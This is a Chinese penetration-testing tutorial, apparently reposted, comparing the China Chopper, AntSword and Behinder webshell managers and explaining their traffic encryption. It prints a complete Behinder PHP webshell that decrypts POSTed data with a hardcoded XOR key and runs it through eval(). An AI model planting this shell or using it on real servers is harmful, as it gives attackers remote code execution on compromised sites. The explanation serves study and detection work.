今天繼續(xù)給大家介紹滲透測(cè)試相關(guān)知識(shí),本文主要內(nèi)容是菜刀、蟻劍以及冰蝎三款Webshell管理工具簡介。
免責(zé)聲明:
本文所介紹的內(nèi)容僅做學(xué)習(xí)交流使用,嚴(yán)禁利用文中技術(shù)進(jìn)行非法行為,否則造成一切嚴(yán)重后果自負(fù)!
再次強(qiáng)調(diào):嚴(yán)禁對(duì)未授權(quán)設(shè)備進(jìn)行滲透測(cè)試!
一、三款webshell管理工具簡單對(duì)比
當(dāng)前,在滲透測(cè)試時(shí)常用的webshell管理工具又菜刀、蟻劍和冰蝎。者三款webshell管理工具特點(diǎn)如下所示:
1、菜刀
菜刀屬于比較原始的插件,功能比較單一,使用比較簡單,目前沒有提供插件,也不支持?jǐn)U展,目前也已經(jīng)停止更新,傳輸方式是單項(xiàng)加密傳輸。此外,菜刀的問題在于只能夠處理eval()函數(shù),而無法處理assert()等函數(shù)。
2、蟻劍
蟻劍是一款還處于更新狀態(tài)的工具,存在插件倉庫,擴(kuò)展性強(qiáng),采取的數(shù)據(jù)傳輸方式是單向加密傳輸。蟻劍與菜刀相比支持編碼和解碼功能。
3、冰蝎
冰蝎目前也處于更新狀態(tài),但是不支持插件,采取的數(shù)據(jù)傳輸方式是雙向加密傳輸,可以聯(lián)動(dòng)MSF。冰蝎相對(duì)而言偏向于后滲透階段。
二、菜刀數(shù)據(jù)包解析
使用菜刀連接PHP webshell的通信數(shù)據(jù)包如下所示:
從上圖可以看出,菜刀的數(shù)據(jù)包是不加密的。
三、蟻劍數(shù)據(jù)包解析
使用蟻劍連接PHP webshell的通信數(shù)據(jù)包如下所示:
從上圖可以看出,蟻劍對(duì)payload進(jìn)行加密的邏輯是,將payload進(jìn)行加密后,轉(zhuǎn)化為一個(gè)參數(shù)的值,然后控制接收該參數(shù)并進(jìn)行解密。
四、冰蝎數(shù)據(jù)包解析
使用冰蝎連接default_xor_base64類型的PHP webshell的通信數(shù)據(jù)包如下所示:
從上圖可以看出,冰蝎的數(shù)據(jù)包是加密的。
冰蝎生成的PHP木馬如下所示:文章來源:http://www.zghlxwxcb.cn/news/detail-462879.html
<?php
@error_reporting(0);
function Decrypt($data)
{
$key="e45e329feb5d925b";
$bs="base64_"."decode";
$after=$bs($data."");
for($i=0;$i<strlen($after);$i++) {
$after[$i] = $after[$i]^$key[$i+1&15];
}
return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>
在上述代碼中,file_get_contents(“php://input”)可以接收客戶端以POST的方式上傳的參數(shù),上傳的結(jié)果會(huì)作為Decrypt參數(shù)的輸入。
Decrypt函數(shù)的作用是對(duì)原始數(shù)據(jù)先進(jìn)行Base64解密,然后再進(jìn)行流解密,最后把數(shù)據(jù)處理的結(jié)果輸出,實(shí)際上就是一個(gè)數(shù)據(jù)解密過程。
原創(chuàng)不易,轉(zhuǎn)載請(qǐng)說明出處:https://blog.csdn.net/weixin_40228200文章來源地址http://www.zghlxwxcb.cn/news/detail-462879.html
到了這里,關(guān)于菜刀、蟻劍以及冰蝎三款Webshell管理工具簡介的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!